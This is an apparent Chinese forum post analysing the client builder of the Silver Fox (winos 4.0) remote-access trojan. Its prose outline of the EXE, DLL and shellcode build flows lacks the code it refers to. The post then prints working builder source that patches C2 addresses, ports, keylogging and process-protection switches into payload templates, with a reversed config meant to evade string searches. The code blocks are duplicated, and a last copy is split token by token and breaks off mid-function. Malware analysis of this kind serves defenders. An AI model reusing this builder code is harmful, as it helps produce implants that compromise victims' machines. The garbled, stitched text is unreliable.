最近在学习木马分析,网上关于银狐的源码分析目前还没看到,挖个坑学一学银狐(winos 4.0)的源码。
客户生成/BuildDlg.cpp
是生成客户端的窗口类(CBuildDlg)的实现代码,是由下面几个函数实现客户端的生成:
生成过程由 CBuildDlg::build 函数进行控制,该函数被上面几个函数调用,此处为核心代码:
整体流程为:
其中获取配置信息的getsettingdata()
函数尤为重要,配置信息由客户端界面进行设置,部分为默认值:
生成客户端(exe)的日志如下:
其中 上线模块.bin -> output_64.exe 的流程由 CBuildDlg::changedataandwritefile() 函数控制,具体流程为:
上述流程详细来说:
也就是说,.bin 文件实际上就是预先编译好的exe文件,最后进行:
生成客户端(dll)的日志为:
生成dll的核心函数为CBuildDlg::OnBnClickedBuilddll()
,具体流程为:
生成时首先会询问是否运行DllMain(DLL入口点),原因是这个dll可以使用两种执行方式:
DLL生成时需要额外处理导出函数,这里额外使用了一个标记 "zidingyixiugaidaochuhanshu":
生成过程中会将这个函数名替换到DLL模板中预设的"zidingyixiugaidaochuhanshu"标记位置。在代码中导出函数名是通过界面上的 m_edit_dll 变量控制的,其默认值为"run":
银狐的设计比较灵活,对比两种dll执行方式,各有优缺点:
DllMain执行:
导出函数执行:
生成Shellcode的主要流程在OnBnClickedBuildShellcode
和changeshellcodeandwritefile
这两个函数中。主要流程如下:
首先提示用户Shellcode的限制:
准备Shellcode的配置信息:
读取Shellcode模板文件:
组合Shellcode数据:
写出Shellcode文件:
其中Shellcode的数据结构为:
数据排列方式:
可以看到这里使用的是执行代码.dll而不是上线模块.dll,是因为执行代码.dll和上线模块.dll的用途和结构是不同的:
上线模块.dll:
执行代码.dll:
执行代码.dll的源码ShellCode_main.cpp
的实现核心为:
从执行代码.dll(shellcode)下载的payload是上线模块.dll/.bin:
最后Shellcode完整执行方式为:
powershell 目前很少用到,并且有一定限制,本文主要针对几种主要使用的客户端生成流程进行分析,如有问题欢迎指正。
// Button handlers of the builder dialog that start a client build. Going by
// the names there is one per output format: EXE, DLL, shellcode, PowerShell.
// Only the names are listed here; the handler bodies are not shown.
void OnBnClickedBuildexe()
void OnBnClickedBuilddll()
void OnBnClickedBuildShellcode()
void OnBnClickedBuildPowershell()
// Button handlers of the builder dialog that start a client build. Going by
// the names there is one per output format: EXE, DLL, shellcode, PowerShell.
// Only the names are listed here; the handler bodies are not shown.
void OnBnClickedBuildexe()
void OnBnClickedBuilddll()
void OnBnClickedBuildShellcode()
void OnBnClickedBuildPowershell()
/// Top-level driver for the EXE (mode 0) and DLL (mode 1) build paths.
///
/// Asks the operator for an output base name, regenerates the configuration
/// with getsettingdata(), then calls changedataandwritefile() once for the
/// x86 template and once for the x64 template.
///
/// @param mode 0: patch 上线模块.bin into <name>_86.exe and <name>_64.exe.
///             1: patch 上线模块.dll into <name>_86.dll and <name>_64.dll.
///             Any other value skips both branches and returns TRUE once the
///             dialog has been confirmed.
/// @return FALSE when the dialog is cancelled or any step fails, else TRUE.
///
/// Analyst note: every successful build produces a pair of files that share
/// one base name and differ only in the _86 / _64 suffix, both derived from
/// prebuilt templates in the builder's Plugins directory.
BOOL CBuildDlg::build(int mode)
{
    // Pull the current control contents into the dialog's member variables.
    UpdateData(TRUE);

    // First argument FALSE makes this a "Save As" dialog; "output" is the
    // default base name that shows up in the build logs.
    CFileDialog dlg(FALSE, _T(""), _T("output"), OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT, _T("可执行文件(*.*)| All Files (*.*) |*.*||"), NULL);
    if (dlg.DoModal() != IDOK)
    {
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("已取消生成\r\n"));
        return FALSE;
    }
    CString path;
    if (mode == 0)
    {
        // EXE build: serialise the settings into confi first.
        if (!getsettingdata())
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数失败\r\n"));
            return FALSE;
        }
        // The .bin templates are written out unchanged in size with an .exe
        // name; writepath is not declared in this function (presumably a
        // member buffer - confirm against the class declaration).
        path = _T("\\Plugins\\x86\\上线模块.bin");
        swprintf_s(writepath, _T("%s_86.exe"), dlg.GetPathName());
        // Called with one argument, so bchangeexport takes whatever default
        // the declaration gives it (not visible here; presumably FALSE).
        if (!changedataandwritefile(path))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x86 exe 生成失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x64\\上线模块.bin");
        swprintf_s(writepath, _T("%s_64.exe"), dlg.GetPathName());
        if (!changedataandwritefile(path))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x64 exe 生成失败\r\n"));
            return FALSE;
        }
    }
    if (mode == 1)
    {
        // DLL build: the operator chooses whether the payload runs from
        // DllMain. The flag is stored before getsettingdata() so that it is
        // serialised under the "入口" key.
        if (MessageBox(_T("Dll加载运行DllMain吗?"), _T("加载执行"), MB_OKCANCEL) == IDOK)
        {
            MyInfo.otherset.RunDllEntryProc = true;
        }
        else
        {
            MyInfo.otherset.RunDllEntryProc = false;
        }
        if (!getsettingdata())
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x86\\上线模块.dll");
        swprintf_s(writepath, _T("%s_86.dll"), dlg.GetPathName());
        // TRUE: also patch the export-name placeholder in the DLL template.
        if (!changedataandwritefile(path, TRUE))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x86 dll 生成失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x64\\上线模块.dll");
        swprintf_s(writepath, _T("%s_64.dll"), dlg.GetPathName());
        if (!changedataandwritefile(path, TRUE))
        {
            // NOTE(review): the message says "exe" although this branch
            // writes the x64 DLL; keep that in mind when reading build logs.
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x64 exe 生成失败\r\n"));
            return FALSE;
        }
    }
    return TRUE;
}
/// Top-level driver for the EXE (mode 0) and DLL (mode 1) build paths.
///
/// Asks the operator for an output base name, regenerates the configuration
/// with getsettingdata(), then calls changedataandwritefile() once for the
/// x86 template and once for the x64 template.
///
/// @param mode 0: patch 上线模块.bin into <name>_86.exe and <name>_64.exe.
///             1: patch 上线模块.dll into <name>_86.dll and <name>_64.dll.
///             Any other value skips both branches and returns TRUE once the
///             dialog has been confirmed.
/// @return FALSE when the dialog is cancelled or any step fails, else TRUE.
///
/// Analyst note: every successful build produces a pair of files that share
/// one base name and differ only in the _86 / _64 suffix, both derived from
/// prebuilt templates in the builder's Plugins directory.
BOOL CBuildDlg::build(int mode)
{
    // Pull the current control contents into the dialog's member variables.
    UpdateData(TRUE);

    // First argument FALSE makes this a "Save As" dialog; "output" is the
    // default base name that shows up in the build logs.
    CFileDialog dlg(FALSE, _T(""), _T("output"), OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT, _T("可执行文件(*.*)| All Files (*.*) |*.*||"), NULL);
    if (dlg.DoModal() != IDOK)
    {
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("已取消生成\r\n"));
        return FALSE;
    }
    CString path;
    if (mode == 0)
    {
        // EXE build: serialise the settings into confi first.
        if (!getsettingdata())
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数失败\r\n"));
            return FALSE;
        }
        // The .bin templates are written out unchanged in size with an .exe
        // name; writepath is not declared in this function (presumably a
        // member buffer - confirm against the class declaration).
        path = _T("\\Plugins\\x86\\上线模块.bin");
        swprintf_s(writepath, _T("%s_86.exe"), dlg.GetPathName());
        // Called with one argument, so bchangeexport takes whatever default
        // the declaration gives it (not visible here; presumably FALSE).
        if (!changedataandwritefile(path))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x86 exe 生成失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x64\\上线模块.bin");
        swprintf_s(writepath, _T("%s_64.exe"), dlg.GetPathName());
        if (!changedataandwritefile(path))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x64 exe 生成失败\r\n"));
            return FALSE;
        }
    }
    if (mode == 1)
    {
        // DLL build: the operator chooses whether the payload runs from
        // DllMain. The flag is stored before getsettingdata() so that it is
        // serialised under the "入口" key.
        if (MessageBox(_T("Dll加载运行DllMain吗?"), _T("加载执行"), MB_OKCANCEL) == IDOK)
        {
            MyInfo.otherset.RunDllEntryProc = true;
        }
        else
        {
            MyInfo.otherset.RunDllEntryProc = false;
        }
        if (!getsettingdata())
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x86\\上线模块.dll");
        swprintf_s(writepath, _T("%s_86.dll"), dlg.GetPathName());
        // TRUE: also patch the export-name placeholder in the DLL template.
        if (!changedataandwritefile(path, TRUE))
        {
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x86 dll 生成失败\r\n"));
            return FALSE;
        }
        path = _T("\\Plugins\\x64\\上线模块.dll");
        swprintf_s(writepath, _T("%s_64.dll"), dlg.GetPathName());
        if (!changedataandwritefile(path, TRUE))
        {
            // NOTE(review): the message says "exe" although this branch
            // writes the x64 DLL; keep that in mind when reading build logs.
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("x64 exe 生成失败\r\n"));
            return FALSE;
        }
    }
    return TRUE;
}
/// Collects the operator's settings from the dialog and serialises them into
/// `confi`, the buffer that changedataandwritefile() later copies into a
/// template.
///
/// Steps, in order:
///   1. copy address / port / transport for three endpoints, the two timing
///      values, the remark and the group from the edit controls into MyInfo;
///   2. read five check boxes into MyInfo.otherset;
///   3. start from the `confimodel` string and call Setfindinfo() once per
///      key (Setfindinfo is a project helper not shown here; from the call
///      shape it takes a text value or a boolean - confirm);
///   4. reverse the resulting string and copy it into `confi`.
///
/// MyInfo.szVersion, MyInfo.otherset.special and
/// MyInfo.otherset.RunDllEntryProc are serialised here but not assigned in
/// this function.
///
/// @return always TRUE; no step in this function reports failure.
///
/// Analyst note: the configuration is stored reversed and with 2 bytes per
/// character, so a forward string search on a sample will not find the
/// endpoint addresses; a config extractor has to reverse the text first.
BOOL CBuildDlg::getsettingdata()
{
    UpdateData(TRUE);
    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数\r\n"));

    // Endpoint 1. Combo index 0 maps to IsTcp == true, any other selection
    // to false.
    _tcscpy_s(MyInfo.szAddress, m_edit_ip.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort, m_edit_port.GetBuffer(0));
    MyInfo.IsTcp = h_combo_net.GetCurSel() ? false : true;
    // Endpoint 2.
    _tcscpy_s(MyInfo.szAddress2, m_edit_ip2.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort2, m_edit_port2.GetBuffer(0));
    MyInfo.IsTcp2 = h_combo_net2.GetCurSel() ? false : true;
    // Endpoint 3.
    _tcscpy_s(MyInfo.szAddress3, m_edit_ip3.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort3, m_edit_port3.GetBuffer(0));
    MyInfo.IsTcp3 = h_combo_net3.GetCurSel() ? false : true;

    // Timing values, remark and group, all kept as text.
    _tcscpy_s(MyInfo.szRunSleep, m_edit_first_time.GetBuffer(0));
    _tcscpy_s(MyInfo.szHeart, m_edit_rest_time.GetBuffer(0));
    _tcscpy_s(MyInfo.Remark, m_edit_v.GetBuffer(0));
    _tcscpy_s(MyInfo.szGroup, m_edit_g.GetBuffer(0));

    // Feature switches taken from the dialog's check boxes.
    MyInfo.otherset.IsKeyboard = (((CButton*)GetDlgItem(IDC_CHECK_KEYBOARD))->GetCheck()) ? true : false;
    MyInfo.otherset.antinet = (((CButton*)GetDlgItem(IDC_CHECK_NET))->GetCheck()) ? true : false;
    MyInfo.otherset.Processdaemon = (((CButton*)GetDlgItem(IDC_CHECK_PROCESSDAEMON))->GetCheck()) ? true : false;
    MyInfo.otherset.ProtectedProcess = (((CButton*)GetDlgItem(IDC_CHECK_PROTEXTEDPROCESS))->GetCheck()) ? true : false;
    MyInfo.otherset.puppet = (((CButton*)GetDlgItem(IDC_CHECK_PUPPET))->GetCheck()) ? true : false;

    // Fill the configuration template key by key.
    CString s = confimodel;
    Setfindinfo(s, _T("地址1"), MyInfo.szAddress, NULL);
    Setfindinfo(s, _T("端口1"), MyInfo.szPort, NULL);
    Setfindinfo(s, _T("通信1"), NULL, MyInfo.IsTcp);
    Setfindinfo(s, _T("地址2"), MyInfo.szAddress2, NULL);
    Setfindinfo(s, _T("端口2"), MyInfo.szPort2, NULL);
    Setfindinfo(s, _T("通信2"), NULL, MyInfo.IsTcp2);
    Setfindinfo(s, _T("地址3"), MyInfo.szAddress3, NULL);
    Setfindinfo(s, _T("端口3"), MyInfo.szPort3, NULL);
    Setfindinfo(s, _T("通信3"), NULL, MyInfo.IsTcp3);
    Setfindinfo(s, _T("等待"), MyInfo.szRunSleep, NULL);
    Setfindinfo(s, _T("重连"), MyInfo.szHeart, NULL);
    Setfindinfo(s, _T("分组"), MyInfo.szGroup, NULL);
    Setfindinfo(s, _T("版本"), MyInfo.szVersion, NULL);
    Setfindinfo(s, _T("备注"), MyInfo.Remark, NULL);
    Setfindinfo(s, _T("键盘"), NULL, MyInfo.otherset.IsKeyboard);
    Setfindinfo(s, _T("保护"), NULL, MyInfo.otherset.ProtectedProcess);
    Setfindinfo(s, _T("流量"), NULL, MyInfo.otherset.antinet);
    Setfindinfo(s, _T("入口"), NULL, MyInfo.otherset.RunDllEntryProc);
    Setfindinfo(s, _T("守护"), NULL, MyInfo.otherset.Processdaemon);
    Setfindinfo(s, _T("傀儡"), NULL, MyInfo.otherset.puppet);
    Setfindinfo(s, _T("特别"), NULL, MyInfo.otherset.special);

    // The whole string is reversed before it is stored.
    s.MakeReverse();
    // Clears 2000 bytes, then copies the text plus a 2-byte terminator;
    // presumably confi holds 1000 wide characters - confirm its declaration.
    ZeroMemory(confi, 1000 * 2);
    memcpy(confi, s.GetBuffer(), s.GetLength() * 2 + 2);
    return TRUE;
}
/// Collects the operator's settings from the dialog and serialises them into
/// `confi`, the buffer that changedataandwritefile() later copies into a
/// template.
///
/// Steps, in order:
///   1. copy address / port / transport for three endpoints, the two timing
///      values, the remark and the group from the edit controls into MyInfo;
///   2. read five check boxes into MyInfo.otherset;
///   3. start from the `confimodel` string and call Setfindinfo() once per
///      key (Setfindinfo is a project helper not shown here; from the call
///      shape it takes a text value or a boolean - confirm);
///   4. reverse the resulting string and copy it into `confi`.
///
/// MyInfo.szVersion, MyInfo.otherset.special and
/// MyInfo.otherset.RunDllEntryProc are serialised here but not assigned in
/// this function.
///
/// @return always TRUE; no step in this function reports failure.
///
/// Analyst note: the configuration is stored reversed and with 2 bytes per
/// character, so a forward string search on a sample will not find the
/// endpoint addresses; a config extractor has to reverse the text first.
BOOL CBuildDlg::getsettingdata()
{
    UpdateData(TRUE);
    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("初始化参数\r\n"));

    // Endpoint 1. Combo index 0 maps to IsTcp == true, any other selection
    // to false.
    _tcscpy_s(MyInfo.szAddress, m_edit_ip.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort, m_edit_port.GetBuffer(0));
    MyInfo.IsTcp = h_combo_net.GetCurSel() ? false : true;
    // Endpoint 2.
    _tcscpy_s(MyInfo.szAddress2, m_edit_ip2.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort2, m_edit_port2.GetBuffer(0));
    MyInfo.IsTcp2 = h_combo_net2.GetCurSel() ? false : true;
    // Endpoint 3.
    _tcscpy_s(MyInfo.szAddress3, m_edit_ip3.GetBuffer(0));
    _tcscpy_s(MyInfo.szPort3, m_edit_port3.GetBuffer(0));
    MyInfo.IsTcp3 = h_combo_net3.GetCurSel() ? false : true;

    // Timing values, remark and group, all kept as text.
    _tcscpy_s(MyInfo.szRunSleep, m_edit_first_time.GetBuffer(0));
    _tcscpy_s(MyInfo.szHeart, m_edit_rest_time.GetBuffer(0));
    _tcscpy_s(MyInfo.Remark, m_edit_v.GetBuffer(0));
    _tcscpy_s(MyInfo.szGroup, m_edit_g.GetBuffer(0));

    // Feature switches taken from the dialog's check boxes.
    MyInfo.otherset.IsKeyboard = (((CButton*)GetDlgItem(IDC_CHECK_KEYBOARD))->GetCheck()) ? true : false;
    MyInfo.otherset.antinet = (((CButton*)GetDlgItem(IDC_CHECK_NET))->GetCheck()) ? true : false;
    MyInfo.otherset.Processdaemon = (((CButton*)GetDlgItem(IDC_CHECK_PROCESSDAEMON))->GetCheck()) ? true : false;
    MyInfo.otherset.ProtectedProcess = (((CButton*)GetDlgItem(IDC_CHECK_PROTEXTEDPROCESS))->GetCheck()) ? true : false;
    MyInfo.otherset.puppet = (((CButton*)GetDlgItem(IDC_CHECK_PUPPET))->GetCheck()) ? true : false;

    // Fill the configuration template key by key.
    CString s = confimodel;
    Setfindinfo(s, _T("地址1"), MyInfo.szAddress, NULL);
    Setfindinfo(s, _T("端口1"), MyInfo.szPort, NULL);
    Setfindinfo(s, _T("通信1"), NULL, MyInfo.IsTcp);
    Setfindinfo(s, _T("地址2"), MyInfo.szAddress2, NULL);
    Setfindinfo(s, _T("端口2"), MyInfo.szPort2, NULL);
    Setfindinfo(s, _T("通信2"), NULL, MyInfo.IsTcp2);
    Setfindinfo(s, _T("地址3"), MyInfo.szAddress3, NULL);
    Setfindinfo(s, _T("端口3"), MyInfo.szPort3, NULL);
    Setfindinfo(s, _T("通信3"), NULL, MyInfo.IsTcp3);
    Setfindinfo(s, _T("等待"), MyInfo.szRunSleep, NULL);
    Setfindinfo(s, _T("重连"), MyInfo.szHeart, NULL);
    Setfindinfo(s, _T("分组"), MyInfo.szGroup, NULL);
    Setfindinfo(s, _T("版本"), MyInfo.szVersion, NULL);
    Setfindinfo(s, _T("备注"), MyInfo.Remark, NULL);
    Setfindinfo(s, _T("键盘"), NULL, MyInfo.otherset.IsKeyboard);
    Setfindinfo(s, _T("保护"), NULL, MyInfo.otherset.ProtectedProcess);
    Setfindinfo(s, _T("流量"), NULL, MyInfo.otherset.antinet);
    Setfindinfo(s, _T("入口"), NULL, MyInfo.otherset.RunDllEntryProc);
    Setfindinfo(s, _T("守护"), NULL, MyInfo.otherset.Processdaemon);
    Setfindinfo(s, _T("傀儡"), NULL, MyInfo.otherset.puppet);
    Setfindinfo(s, _T("特别"), NULL, MyInfo.otherset.special);

    // The whole string is reversed before it is stored.
    s.MakeReverse();
    // Clears 2000 bytes, then copies the text plus a 2-byte terminator;
    // presumably confi holds 1000 wide characters - confirm its declaration.
    ZeroMemory(confi, 1000 * 2);
    memcpy(confi, s.GetBuffer(), s.GetLength() * 2 + 2);
    return TRUE;
}
开始生成.
初始化参数
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x86\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_86.exe
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x64\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_64.exe
生成成功
开始生成.
初始化参数
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x86\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_86.exe
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x64\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_64.exe
生成成功
/// Loads a prebuilt template from the builder's own directory, overwrites
/// the configuration placeholder (and, for DLLs, the export-name
/// placeholder) in memory, and writes the result to `writepath`.
///
/// @param path           template path relative to the builder executable's
///                       directory.
/// @param bchangeexport  when non-zero, the export-name placeholder is also
///                       replaced with the ANSI form of m_edit_dll.
/// @return TRUE once the patched image has been written; FALSE if the
///         template is missing or unreadable, a placeholder is not found, or
///         the output file cannot be created.
///
/// Analyst note: exactly `len` bytes are written, so a generated sample has
/// the same size as its template and is identical to it outside the patched
/// regions. Code-level similarity between samples built from one template
/// version is therefore very high, and the per-sample differences sit at the
/// placeholder offsets.
BOOL CBuildDlg::changedataandwritefile(CString path, BOOL bchangeexport)
{
    // Directory of the running builder: take the module path and cut it at
    // the last backslash.
    TCHAR DatPath[MAX_PATH] = { 0 };
    GetModuleFileName(NULL, DatPath, sizeof(DatPath));
    *_tcsrchr(DatPath, _T('\\')) = '\0';
    CString path_data;
    path_data = DatPath;
    path_data += path;

    // Existence check; the find handle is closed again straight away.
    WIN32_FIND_DATA FindData;
    HANDLE hFile;
    hFile = FindFirstFile(path_data, &FindData);
    if (hFile == INVALID_HANDLE_VALUE) { m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("文件不存在")); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer()); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n")); return FALSE; }
    FindClose(hFile);

    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("读取文件")); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer()); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));
    hFile = CreateFile(path_data, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("读取文件失败")); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer()); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));
        return FALSE;
    }

    // Read the whole template into memory.
    DWORD len = GetFileSize(hFile, NULL);
    char* str = new char[len];
    // sizeof(str) is the size of the pointer, not of the buffer; the
    // ReadFile call below is what actually fills it.
    ZeroMemory(str, sizeof(str));
    DWORD wr = 0;
    ReadFile(hFile, str, len, &wr, NULL);
    CloseHandle(hFile);

    m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("修改配置信息\r\n"));

    // Locate the configuration placeholder. memfind is a project helper not
    // shown here; from its use it yields a byte offset, or -1 when nothing
    // matches. The marker goes through _T(), so in a Unicode build it is
    // searched as a wide string - presumably stored that way in the template.
    DWORD dwOffset = -1;
    dwOffset = memfind(str, _T("xiugaishiyong"), len, 0);
    if (dwOffset == -1)
    {
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("找不到上线配置标记 \r\n"));
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("r\n"));
        SAFE_DELETE_AR(str);
        return FALSE;
    }

    DWORD dwOffset_export = -1;
    char* exportnamebuf = NULL;
    int exportnamelen = 0;
    if (bchangeexport)
    {
        // The export placeholder is a narrow (ANSI) literal, unlike the
        // configuration marker above.
        dwOffset_export = memfind(str, "zidingyixiugaidaochuhanshu", len, 0);
        // Length query with cchWideChar == -1 counts the terminating NUL, so
        // exportnamelen covers the name and its terminator.
        exportnamelen = WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, NULL, 0, NULL, NULL);
        exportnamebuf = new char[exportnamelen + 1];
        WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, exportnamebuf, exportnamelen, NULL, NULL);
        if ((dwOffset_export == -1))
        {
            log_信息("找不到导出函数");
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("找不到导出函数zidingyixiugaidaochuhanshu标记\r\n"));
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)path_data.GetBuffer());
            m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("r\n"));
            SAFE_DELETE_AR(exportnamebuf);
            SAFE_DELETE_AR(str);
            return FALSE;
        }
    }

    CFile file;
    if (file.Open(writepath, CFile::modeCreate | CFile::modeWrite | CFile::modeRead | CFile::typeBinary))
    {
        // Overwrite the placeholder with the contents of confi (filled by
        // getsettingdata()): the text at 2 bytes per character plus one byte.
        if (dwOffset != -1)
            memcpy(str + dwOffset, (char*)&confi, lstrlen(confi) * 2 + 1);
        // Overwrite the export placeholder with the chosen name.
        if (bchangeexport)
            memcpy(str + dwOffset_export, (char*)exportnamebuf, exportnamelen);
        // The output has the template's length; nothing is appended.
        file.Write(str, len);
        file.Close();
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("写出成功")); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)writepath); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("\r\n"));
        SAFE_DELETE_AR(str);
        return TRUE;
    }
    else
    {
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("文件无法创建,查看是否占用\r\n"));
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)writepath);
        m_edit_tip.SendMessage(EM_REPLACESEL, 0, (LPARAM)_T("r\n"));
        SAFE_DELETE_AR(str);
        return FALSE;
    }
}
BOOL
CBuildDlg::changedataandwritefile(CString path,
BOOL
bchangeexport)
{
TCHAR
DatPath[MAX_PATH] = { 0 };
GetModuleFileName(NULL, DatPath,
sizeof
(DatPath));
*_tcsrchr(DatPath, _T(
'\\'
)) =
'\0'
;
CString path_data;
path_data = DatPath;
path_data += path;
WIN32_FIND_DATA FindData;
HANDLE
hFile;
hFile = FindFirstFile(path_data, &FindData);
if
(hFile == INVALID_HANDLE_VALUE) { m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"文件不存在"
)); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)path_data.GetBuffer()); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"\r\n"
));
return
FALSE; }
FindClose(hFile);
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"读取文件"
)); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)path_data.GetBuffer()); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"\r\n"
));
hFile = CreateFile(path_data, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if
(hFile == INVALID_HANDLE_VALUE)
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"读取文件失败"
)); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)path_data.GetBuffer()); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"\r\n"
));
return
FALSE;
}
DWORD
len = GetFileSize(hFile, NULL);
char
* str =
new
char
[len];
ZeroMemory(str,
sizeof
(str));
DWORD
wr = 0;
ReadFile(hFile, str, len, &wr, NULL);
CloseHandle(hFile);
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"修改配置信息\r\n"
));
DWORD
dwOffset = -1;
dwOffset = memfind(str, _T(
"xiugaishiyong"
), len, 0);
if
(dwOffset == -1)
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"找不到上线配置标记 \r\n"
));
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)path_data.GetBuffer());
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"r\n"
));
SAFE_DELETE_AR(str);
return
FALSE;
}
DWORD
dwOffset_export = -1;
char
* exportnamebuf = NULL;
int
exportnamelen = 0;
if
(bchangeexport)
{
dwOffset_export = memfind(str,
"zidingyixiugaidaochuhanshu"
, len, 0);
exportnamelen = WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, NULL, 0, NULL, NULL);
exportnamebuf =
new
char
[exportnamelen + 1];
WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, exportnamebuf, exportnamelen, NULL, NULL);
if
((dwOffset_export == -1))
{
log_信息(
"找不到导出函数"
);
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"找不到导出函数zidingyixiugaidaochuhanshu标记\r\n"
));
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)path_data.GetBuffer());
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"r\n"
));
SAFE_DELETE_AR(exportnamebuf);
SAFE_DELETE_AR(str);
return
FALSE;
}
}
CFile file;
if
(file.Open(writepath, CFile::modeCreate | CFile::modeWrite | CFile::modeRead | CFile::typeBinary))
{
if
(dwOffset != -1)
memcpy
(str + dwOffset, (
char
*)&confi, lstrlen(confi) * 2 + 1);
if
(bchangeexport)
memcpy
(str + dwOffset_export, (
char
*)exportnamebuf, exportnamelen);
file.Write(str, len);
file.Close();
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"写出成功"
)); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)writepath); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"\r\n"
));
SAFE_DELETE_AR(str);
return
TRUE;
最后于 2024-11-22 10:54
被bwner编辑
,原因: